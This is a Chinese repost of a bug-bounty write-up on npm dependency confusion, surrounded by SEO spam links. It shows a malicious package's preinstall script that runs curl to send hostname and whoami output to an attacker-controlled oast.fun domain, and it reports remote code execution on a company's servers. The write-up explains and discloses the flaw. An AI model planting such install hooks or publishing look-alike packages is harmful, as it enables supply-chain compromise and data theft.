当前位置: 首页 > news >正文

访问外国网站很慢手机端竞价恶意点击

访问外国网站很慢,手机端竞价恶意点击,网站建设添加音乐的代码,鸿川建设工程有限公司官方网站未经许可,不得转载。 文章目录 正文 依赖混淆是一种供应链攻击漏洞,发生在企业的内部依赖包错误地从公共库(如npm)下载,而不是从其私有注册表下载。攻击者可以在公共注册表中上传一个与公司内部包同名的恶意包&#xf…

未经许可,不得转载。

文章目录

    • 正文

依赖混淆是一种供应链攻击漏洞,发生在企业的内部依赖包错误地从公共库(如npm)下载,而不是从其私有注册表下载。攻击者可以在公共注册表中上传一个与公司内部包同名的恶意包,一旦企业系统从公共源解析并下载该包,恶意代码便可能被执行,进而带来安全风险,如远程代码执行(RCE)。

正文

我发现某企业的前端 JavaScript 文件引用了一个存储在/node_modules/@confidential-package-name的Node.js包。进一步查询后,我发现这个内部包尚未在npm公共注册表中注册。

我创建了一个与内部包同名的恶意npm包,并将其发布到公共npm注册表中。在该包的preinstall脚本中,我嵌入了一个简单的命令,用来在安装时自动执行:

curl — data-urlencode “info=$(hostname && whoami)” http://<attacker-controlled-domain>.oast.fun

这个脚本会将服务器的主机名和用户名发送到我控制的域。

img

包上线后,数小时至几天内就收到了来自该公司的生产环境和非生产环境的多个请求,这说明他们的系统正在下载并执行这个恶意包。

img

在收到超过150个HTTP和DNS查询后,我分析IP地址,排除了已知的爬虫流量,并通过WHOIS查询检哪些请求能够匹配企业IP或其服务提供商的IP。可以看到,我实现了RCE:

img

img

原文出处:https://medium.com/@p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643

http://www.yidumall.com/news/106405.html

相关文章:

  • 网络促销分类 网站促销微信管理系统
  • 海口seo快速排名优化seo代运营
  • 个人微信公众号怎么做微网站线上推广费用
  • 做镜像网站品牌策划ppt案例
  • 适合大学生个体创业的网站建设永州网络推广
  • 毕设做网站太简单百度推广优化公司
  • 建设功能网站价格网站大全软件下载
  • 公司制作网站怎么做百度指数人群画像怎么看
  • 温州网站开发培训html简单网页成品
  • 网站域名改版怎么做国内十大4a广告公司
  • 广州做外贸网站的公司域名停靠
  • 优秀网站案例欣赏软文300字案例
  • 坪地网站建设效果作品推广
  • 做钓鱼网站视频教程站长检测工具
  • java做网站教程优化人员配置
  • 重庆微信网站制作价格网站域名ip地址查询
  • 网络监控软件网络seo营销推广
  • 买程序的网站线上销售平台有哪些
  • 廊坊做网站多少钱今日要闻
  • 做网站后期都用什么软件建站seo推广
  • 网站定制建设潍坊网站建设
  • 苏州高端做网站百度官方网站
  • 自动优化网站建设电话sem是什么意思的缩写
  • 网站建设创客seo黑帽培训骗局
  • php网站开发视频教学鹤壁网站seo
  • 高校招生网站建设百度竞价排名是哪种方式
  • 怎么自己设置网站模板四年级新闻摘抄大全
  • 做网赌网站需要多少钱搜索引擎哪个好
  • 网站建设的报价为什么不同seo外推软件
  • nginx wordpress css双桥seo排名优化培训